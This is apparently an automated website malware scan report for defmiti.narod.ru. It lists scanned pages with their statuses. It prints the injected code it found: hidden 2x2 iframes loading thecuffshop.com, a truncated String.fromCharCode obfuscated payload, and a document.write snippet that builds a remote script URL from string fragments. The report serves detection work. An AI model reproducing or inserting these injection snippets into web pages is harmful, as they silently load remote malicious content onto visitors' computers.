Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=defmiti.narod.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://defmiti.narod.ru/ | 200 OK Content-Length: 22053 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/27.html | 200 OK Content-Length: 21497 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/12.html | 200 OK Content-Length: 22572 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.359708064719079 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/abnl/?adsdata=U3jT^jq;9BJ4JYuPXyaxWBH^exxeJYP0sZZjrzND5sv!^UAfSIF!38vfr!Tuue^5wbyX5LhL3iW1IQP!bXug!mwWidtmZCJNWgfeBQjzQ^HBdwqcWU4;Yf4VHKRV8mTbN0kkp99ZEGvnNm1M4UZO3j4ORniyAnMn52pqFRZhstUBL4Kvd!sb!woo | 200 OK Content-Length: 2497 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/fiwinosyxi.js | 200 OK Content-Length: 370 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?j=1940935></iframe>');
var sub="ruad2", perv="ra",vtor="ount",tret="/c",chet="hota.ru", pyat="ers/"+sub+".js";document.write('<script language="javascript" type="text/javascript" src="http://'+perv+chet+tret+vtor+pyat+'"></script>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?j=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?j=1940935> | ||
http://morenews3.net/viewt.js | 200 OK Content-Length: 24772 Content-Type: application/x-javascript | clean |
http://crackac.com/a2/9726522/4ea0 | 200 OK Content-Length: 13208 Content-Type: application/javascript | clean |
http://vkontakte.ru/js/api/share.js?9 | 200 OK Content-Length: 10255 Content-Type: application/x-javascript | clean |
http://defmiti.narod.ru/11.html | 200 OK Content-Length: 24761 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.239812573104707 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/abnl/?adsdata=jSjsD54FV;YcwPlUVLpNC;0H^!iqLbQAQzTOiw7Tr6znHhqPsf2g9JkY6hRUht783P9OEOXkvagBnFOYsN5u9nDu!3Oc5TBmWIIG^mtfGBOKAQSlSmReyf1Fm86QCPtYRWlUqD;O;MiwRQ9EzCl9Z6FprMYLXgzwTdZPdzOkWs0r7ziqaw6vZuu68Uoo | 200 OK Content-Length: 2509 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/10.html | 200 OK Content-Length: 20756 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/13.html | 200 OK Content-Length: 21291 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.695141698031176 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: defmiti.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Aug 2015 08:35:08 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: defmiti.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Aug 2015 08:35:08 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: defmiti.narod.ru
Referer: http://www.google.com/search?q=defmiti.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: defmiti.narod.ru
Referer: http://www.google.com/search?q=defmiti.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.